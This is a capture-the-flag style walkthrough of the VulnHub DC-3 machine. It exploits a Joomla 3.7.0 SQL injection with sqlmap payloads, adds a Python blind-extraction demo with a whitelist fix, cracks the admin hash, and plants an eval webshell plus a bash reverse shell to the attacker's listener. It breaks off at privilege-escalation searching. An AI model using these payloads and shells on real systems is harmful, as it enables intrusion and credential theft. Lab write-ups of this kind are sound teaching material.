vulnhub: DC-3.2

Information gathering

Identify the target

└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:9e:68:11, IPv4: 192.168.1.43
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.2     d4:8f:a2:9f:51:49       Huawei Device Co., Ltd.
192.168.1.9     30:03:c8:49:52:4d       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.5     3c:55:76:dc:ab:f5 (42:f1:e2:49:51:a5)   CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.8     e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5)   (Unknown)
192.168.1.7     3c:e9:f7:c0:ef:c7       Intel Corporate
192.168.1.44    00:0c:29:e4:77:be       VMware, Inc.
192.168.1.12    42:45:ab:5e:e9:ce       (Unknown: locally administered)
192.168.1.4     4c:f2:02:dd:eb:da       Xiaomi Communications Co Ltd

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.451 seconds (104.45 hosts/sec). 8 responded

The VMware entry is the target:

192.168.1.44    00:0c:29:e4:77:be       VMware, Inc.

Open ports

└─# nmap -sV -p- 192.168.1.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 10:17 CST
Nmap scan report for 192.168.1.44
Host is up (0.00077s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:E4:77:BE (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.10 seconds

Only port 80 is open.

flag 1

Visiting the site shows the following:

Welcome to DC-3.

This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge.  :-)

Hmm, nothing useful there.

Fingerprint the site instead.


└─# whatweb -v 192.168.1.44
WhatWeb report for http://192.168.1.44
Status    : 200 OK
Title     : Home
IP        : 192.168.1.44
Country   : RESERVED, ZZ

Summary   : Apache[2.4.18], Bootstrap, Cookies[460ada11b31d3c5e5ca6e58fd5d3de27], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[460ada11b31d3c5e5ca6e58fd5d3de27], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PasswordField[password], Script[application/json]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.18 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ Bootstrap ]
        Bootstrap is an open source toolkit for developing with
        HTML, CSS, and JS.

        Website     : https://getbootstrap.com/

[ Cookies ]
        Display the names of cookies in the HTTP headers. The
        values are not returned to save on space.

        String       : 460ada11b31d3c5e5ca6e58fd5d3de27

[ HTML5 ]
        HTML version 5, detected by the doctype declaration


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.18 (Ubuntu) (from server string)

[ HttpOnly ]
        If the HttpOnly flag is included in the HTTP set-cookie
        response header and the browser supports it then the cookie
        cannot be accessed through client side script - More Info:
        http://en.wikipedia.org/wiki/HTTP_cookie

        String       : 460ada11b31d3c5e5ca6e58fd5d3de27

[ JQuery ]
        A fast, concise, JavaScript that simplifies how to traverse
        HTML documents, handle events, perform animations, and add
        AJAX.

        Website     : http://jquery.com/

[ MetaGenerator ]
        This plugin identifies meta generator tags and extracts its
        value.

        String       : Joomla! - Open Source Content Management

[ PasswordField ]
        find password fields

        String       : password (from field name)

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.

        String       : application/json

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Mon, 08 Jan 2024 02:40:23 GMT
        Server: Apache/2.4.18 (Ubuntu)
        Set-Cookie: 460ada11b31d3c5e5ca6e58fd5d3de27=7addibbboe7rp5ek26q3fs5c54; path=/; HttpOnly
        Expires: Wed, 17 Aug 2005 00:00:00 GMT
        Last-Modified: Mon, 08 Jan 2024 02:40:23 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2472
        Connection: close
        Content-Type: text/html; charset=utf-8


The CMS is Joomla. Kali ships a scanner built specifically for it, joomscan.



└─# joomscan --url http://192.168.1.44

    ____  _____  _____  __  __  ___   ___    __    _  _
   (_  _)(  _  )(  _  )(  \/  )/ __) / __)  /__\  ( \( )
  .-_)(   )(_)(  )(_)(  )    ( \__ \( (__  /(__)\  )  (
  \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
                        (1337.today)

    --=[OWASP JoomScan
    +---++---==[Version : 0.0.7
    +---++---==[Update Date : [2018/09/23]
    +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
    --=[Code name : Self Challenge
    @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP

Processing http://192.168.1.44 ...



[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.7.0

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.1.44/administrator/components
http://192.168.1.44/administrator/modules
http://192.168.1.44/administrator/templates
http://192.168.1.44/images/banners


[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.1.44/administrator/

[+] Checking robots.txt existing
[++] robots.txt is not found

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config files are not found


Your Report : reports/192.168.1.44/

That gives the version, 3.7.0, and the admin login page http://192.168.1.44/administrator/. Do not take the "Target Joomla core is not vulnerable" line at face value: this joomscan build dates from 2018 and its core-vulnerability check misses the well-known 3.7.0 SQL injection, so always cross-check the detected version yourself.

Two ways to find an exploit for it:
1. searchsploit
2. a search engine

searchsploit is shown here.

└─# searchsploit Joomla 3.7.0
----------------------------------------------------- ---------------------------------
 Exploit Title                                       |  Path
----------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection           | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site  | php/webapps/43488.txt
----------------------------------------------------- ---------------------------------
Shellcodes: No Results

Pick the first one.
└─# searchsploit -p 42033.txt  # -p Show the full path to an exploit 
  Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
      URL: https://www.exploit-db.com/exploits/42033
     Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
    Codes: CVE-2017-8917
 Verified: False
File Type: ASCII text

Copy it to the current directory
└─# cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla.txt


Read it
└─# cat joomla.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917


URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27


Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
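Why this parameter is exploitable even though the value goes through the database layer's escaping: the sort expression lands directly in an ORDER BY clause, where it is not inside a string literal, so quote-escaping has nothing to act on; the CASE WHEN ... payload sqlmap lists above is a quote-free boolean oracle of exactly that kind. The following is an added example, not Joomla's code: an SQLite stand-in for #__users (with the admin hash from this box as constructed sample data), a sort helper built the vulnerable way, a blind extraction loop driven by row order alone, and the column whitelist that closes the hole. Table, column and function names are my own.

```python
"""
ORDER BY injection survives escaping; only a whitelist fixes it.
Added example, not Joomla code: SQLite stands in for MySQL, `users` for #__users.
"""
import sqlite3

ADMIN_HASH = "$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu"  # from the dump on this page
HASH_ALPHABET = "./$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"


def make_db() -> sqlite3.Connection:
    """Constructed sample table; only the admin row carries a real-looking hash."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", ADMIN_HASH),
        (2, "editor", "$2y$10$placeholder.hash.for.editor"),
        (3, "guest", "$2y$10$placeholder.hash.for.guest."),
    ])
    return con


def escape(value: str) -> str:
    """MySQL-style quote escaping: protects a value inside '...', nothing else."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def list_ids_vulnerable(con, fullordering: str):
    """The vulnerable pattern: the request value becomes the ORDER BY expression.
    escape() is applied and achieves nothing, because no quotes surround the value."""
    rows = con.execute(f"SELECT id FROM users ORDER BY {escape(fullordering)}")
    return [r[0] for r in rows]


ALLOWED_COLUMNS = {"id", "username"}
ALLOWED_DIRECTIONS = {"", "ASC", "DESC"}


def list_ids_safe(con, fullordering: str):
    """The fix: only a known column name and direction ever reach the SQL string."""
    column, _, direction = fullordering.strip().partition(" ")
    if column not in ALLOWED_COLUMNS or direction.upper() not in ALLOWED_DIRECTIONS:
        raise ValueError(f"rejected ordering value: {fullordering!r}")
    rows = con.execute(f"SELECT id FROM users ORDER BY {column} {direction}")
    return [r[0] for r in rows]


def oracle_payload(position: int, guess: str) -> str:
    """Quote-free boolean probe (compares code points, so no string literal is needed):
    rows sort ascending when the guessed character is right, descending otherwise."""
    return (f"(CASE WHEN (SELECT unicode(substr(password,{position},1)) FROM users WHERE id=1)"
            f"={ord(guess)} THEN id ELSE -id END)")


def blind_extract(con, length: int, alphabet: str = HASH_ALPHABET) -> str:
    """Recover the admin hash one character at a time from row order alone."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if list_ids_vulnerable(con, oracle_payload(pos, ch)) == [1, 2, 3]:
                recovered += ch
                break
        else:
            raise RuntimeError(f"no candidate matched at position {pos}")
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", blind_extract(db, len(ADMIN_HASH)))
    try:
        list_ids_safe(db, oracle_payload(1, "$"))
    except ValueError as err:
        print("hardened version:", err)
```

The blind loop needs one request per candidate character per position, which is why sqlmap prefers the error-based channel when it is available; the whitelist version rejects anything that is not a bare column name with an optional direction, which is the only check that works in this position of the query.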

Run the sqlmap command from the advisory, with the host swapped for the target:
└─# sqlmap -u "http://192.168.1.44/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.11#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org


available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

Five databases are dumped. Along the way sqlmap asks a few questions; my answers:

you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=85h308t28pj...u65h9kn9g5'). Do you want to use those [Y/n] Y

testing for SQL injection on GET parameter 'list[fullordering]'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

GET parameter 'list[fullordering]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

Next, select joomladb and keep going.

Enumerate tables
└─# sqlmap -u "http://192.168.1.44/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

76 tables; the one worth looking at is #__users. (Joomla normally substitutes the configured table prefix for the #__ placeholder; on this box the prefix is literally #__, which is why the table has this name and why it has to be quoted on the command line.)

Enumerate columns
└─# sqlmap -u "http://192.168.1.44/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

do you want to use common column existence check? [y/N/q] y

Press Enter to accept the default wordlist:
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom


Six columns come back:
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| name     | non-numeric |
| email    | non-numeric |
| id       | numeric     |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

Dump the three columns that matter:
└─# sqlmap -u "http://192.168.1.44/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password,username --dump -p list[fullordering]

+--------+--------------------------------------------------------------+----------+
| name   | password                                                     | username |
+--------+--------------------------------------------------------------+----------+
| admin  | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin    |
+--------+--------------------------------------------------------------+----------+

Save the hash to hash.txt and hand it to john. This is bcrypt, a deliberately slow salted hash, not something that can be decrypted: john can only try candidates, and at this cost (1024 iterations) it manages a few hundred per second, so the attack works only because the password is in its default wordlist.

└─# john hash.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
snoopy           (?)
1g 0:00:00:00 DONE 2/3 (2024-01-08 20:45) 4.347g/s 313.0p/s 313.0c/s 313.0C/s 123456..wizard
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is snoopy (john --show hash.txt prints it again later).

Log in at /administrator/index.php as admin:snoopy (the front-end login works too, but there is nothing useful there). Poking around the back end, the way in is under Templates.

In the left-hand menu click Templates; the sub-menu defaults to Styles. Under the Template column on the right click beez3, which opens a page with the template's file tree on the left and lets you edit any PHP file in place. That immediately suggests a one-line webshell and a reverse shell, but without knowing where the files live on disk there is nothing to connect to... Clicking any PHP file, however, shows a partial path at the top of the editor (e.g. Editing file "/html/modules.php" in template "beez3").

So let's run a quick directory scan.

└─# dirb http://192.168.1.44

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Jan  9 00:06:41 2024
URL_BASE: http://192.168.1.44/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.44/ ----
==> DIRECTORY: http://192.168.1.44/administrator/
==> DIRECTORY: http://192.168.1.44/bin/
==> DIRECTORY: http://192.168.1.44/cache/
==> DIRECTORY: http://192.168.1.44/components/
==> DIRECTORY: http://192.168.1.44/images/
==> DIRECTORY: http://192.168.1.44/includes/
+ http://192.168.1.44/index.php (CODE:200|SIZE:7147)
==> DIRECTORY: http://192.168.1.44/language/
==> DIRECTORY: http://192.168.1.44/layouts/
==> DIRECTORY: http://192.168.1.44/libraries/
==> DIRECTORY: http://192.168.1.44/media/
==> DIRECTORY: http://192.168.1.44/modules/
==> DIRECTORY: http://192.168.1.44/plugins/
+ http://192.168.1.44/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://192.168.1.44/templates/
==> DIRECTORY: http://192.168.1.44/tmp/

---- Entering directory: http://192.168.1.44/administrator/ ----
==> DIRECTORY: http://192.168.1.44/administrator/cache/
==> DIRECTORY: http://192.168.1.44/administrator/components/
==> DIRECTORY: http://192.168.1.44/administrator/help/
==> DIRECTORY: http://192.168.1.44/administrator/includes/
+ http://192.168.1.44/administrator/index.php (CODE:200|SIZE:4797)
==> DIRECTORY: http://192.168.1.44/administrator/language/
==> DIRECTORY: http://192.168.1.44/administrator/logs/
==> DIRECTORY: http://192.168.1.44/administrator/modules/
==> DIRECTORY: http://192.168.1.44/administrator/templates/

---- Entering directory: http://192.168.1.44/bin/ ----
+ http://192.168.1.44/bin/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/cache/ ----
+ http://192.168.1.44/cache/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/components/ ----
+ http://192.168.1.44/components/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/images/ ----
==> DIRECTORY: http://192.168.1.44/images/banners/
==> DIRECTORY: http://192.168.1.44/images/headers/
+ http://192.168.1.44/images/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/includes/ ----
+ http://192.168.1.44/includes/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/language/ ----
+ http://192.168.1.44/language/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/layouts/ ----
+ http://192.168.1.44/layouts/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/layouts/joomla/
==> DIRECTORY: http://192.168.1.44/layouts/libraries/
==> DIRECTORY: http://192.168.1.44/layouts/plugins/

---- Entering directory: http://192.168.1.44/libraries/ ----
==> DIRECTORY: http://192.168.1.44/libraries/cms/
+ http://192.168.1.44/libraries/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/libraries/joomla/
==> DIRECTORY: http://192.168.1.44/libraries/legacy/
+ http://192.168.1.44/libraries/vendor (CODE:403|SIZE:303)

---- Entering directory: http://192.168.1.44/media/ ----
==> DIRECTORY: http://192.168.1.44/media/cms/
==> DIRECTORY: http://192.168.1.44/media/contacts/
==> DIRECTORY: http://192.168.1.44/media/editors/
+ http://192.168.1.44/media/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/media/mailto/
==> DIRECTORY: http://192.168.1.44/media/media/
==> DIRECTORY: http://192.168.1.44/media/system/

---- Entering directory: http://192.168.1.44/modules/ ----
+ http://192.168.1.44/modules/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/plugins/ ----
==> DIRECTORY: http://192.168.1.44/plugins/authentication/
==> DIRECTORY: http://192.168.1.44/plugins/captcha/
==> DIRECTORY: http://192.168.1.44/plugins/content/
==> DIRECTORY: http://192.168.1.44/plugins/editors/
==> DIRECTORY: http://192.168.1.44/plugins/extension/
==> DIRECTORY: http://192.168.1.44/plugins/fields/
+ http://192.168.1.44/plugins/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/plugins/installer/
==> DIRECTORY: http://192.168.1.44/plugins/search/
==> DIRECTORY: http://192.168.1.44/plugins/system/
==> DIRECTORY: http://192.168.1.44/plugins/user/

---- Entering directory: http://192.168.1.44/templates/ ----
+ http://192.168.1.44/templates/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/templates/system/

---- Entering directory: http://192.168.1.44/tmp/ ----
+ http://192.168.1.44/tmp/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/tmp/packages/

---- Entering directory: http://192.168.1.44/administrator/cache/ ----
+ http://192.168.1.44/administrator/cache/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/administrator/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/administrator/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/administrator/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/administrator/logs/ ----
+ http://192.168.1.44/administrator/logs/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.1.44/administrator/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/administrator/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/images/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/images/headers/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/layouts/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/layouts/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/layouts/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/libraries/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/libraries/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/libraries/legacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/media/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/media/contacts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/media/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/media/mailto/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/media/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/media/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/authentication/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/captcha/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/extension/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/fields/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/plugins/user/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/templates/system/ ----
==> DIRECTORY: http://192.168.1.44/templates/system/css/
==> DIRECTORY: http://192.168.1.44/templates/system/html/
==> DIRECTORY: http://192.168.1.44/templates/system/images/
+ http://192.168.1.44/templates/system/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.1.44/tmp/packages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/templates/system/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/templates/system/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.1.44/templates/system/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Jan  9 00:07:42 2024
DOWNLOADED: 83016 - FOUND: 20

The only interesting hits are http://192.168.1.44/templates/ and http://192.168.1.44/administrator/templates/; the latter's layout does not match the editor we just saw, so it is ruled out.
Combining this with the earlier path hint, http://192.168.1.44/templates/beez3/html/ turns out to mirror the file tree in the editor. Add @eval($_REQUEST['joomla']); to modules.php and connect with AntSword (URL http://192.168.1.44/templates/beez3/html/modules.php): the connection succeeds. This modifies a template file that ships with the site, so remove it again when done.

AntSword is only used here to confirm the path. The real goal is a reverse shell: a webshell like this executes one command per HTTP request, which is clumsy for anything interactive.

Write the following into templates/beez3/html/shell.php:

<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.1.43/4444 0>&1' ");
?>

Explanation:
This PHP calls system() to run a bash one-liner that opens a TCP connection to 192.168.1.43 port 4444 and attaches an interactive shell to it. This is a reverse shell: the compromised host connects out to the attacker, who then types commands into it.

Piece by piece:

1. `<?php ... ?>`: PHP open and close tags; everything between them is PHP code.
2. `system(...)`: runs an external command and prints its output. PHP hands the string to /bin/sh, which on Ubuntu is dash; dash does not implement the /dev/tcp pseudo-device, which is why the command is wrapped in `bash -c`.
3. `bash -c 'bash -i >& /dev/tcp/192.168.1.43/4444 0>&1'`: the command itself, in parts:


	* `bash -c`: start bash and have it run the quoted string as a command.
	* `'bash -i >& /dev/tcp/192.168.1.43/4444 0>&1'`: the bash command string, broken down further:
		+ `bash -i`: start an interactive bash.
		+ `>& /dev/tcp/192.168.1.43/4444`: redirect stdout and stderr to a TCP socket that bash opens to 192.168.1.43 port 4444 (the /dev/tcp path is a bash built-in, not a real file).
		+ `0>&1`: make stdin a duplicate of stdout, which is now the socket, so bash reads its commands from the same connection.

Net effect: the web server process (www-data) opens a shell session to the attacker's listener on 192.168.1.43:4444, giving remote command execution with the web server's privileges.

Start a listener on Kali, then request http://192.168.1.44/templates/beez3/html/shell.php

ps:
`nc` (netcat) is a command-line tool on Unix-like systems for reading and writing raw network connections.

`-l` puts `nc` into listen mode: it waits for an incoming connection instead of making one.

`-v` turns on verbose output.

`-p 4444` sets the local port to listen on.

So `nc -lvvp 4444` means: listen on port 4444 on all interfaces, print connection details, and wait for a client.

The two `v`s in `-lvvp` are not two different options; repeating `-v` simply raises the verbosity level. This is the traditional-netcat syntax used on Kali; with OpenBSD netcat the port is given as a plain argument (`nc -lv 4444`).

└─# nc -lvvp 4444
listening on [any] 4444 ...
192.168.1.44: inverse host lookup failed: Unknown host
connect to [192.168.1.43] from (UNKNOWN) [192.168.1.44] 37278
bash: cannot set terminal process group (1324): Inappropriate ioctl for device
bash: no job control in this shell
www-data@DC-3:/var/www/html/templates/beez3/html$

Check the system

www-data@DC-3:/var/www/html/templates/beez3/html$ uname -a  
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux

www-data@DC-3:/var/www/html/templates/beez3/html$ cat /proc/version
cat /proc/version
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016

www-data@DC-3:/var/www/html/templates/beez3/html$ cat /etc/issue  # distribution banner
cat /etc/issue
Ubuntu 16.04 LTS \n \l

Back on Kali, look for known exploits against this Ubuntu release.

└─# searchsploit Ubuntu 16.04
----------------------------------------------------- ---------------------------------
 Exploit Title                                       |  Path
----------------------------------------------------- ---------------------------------
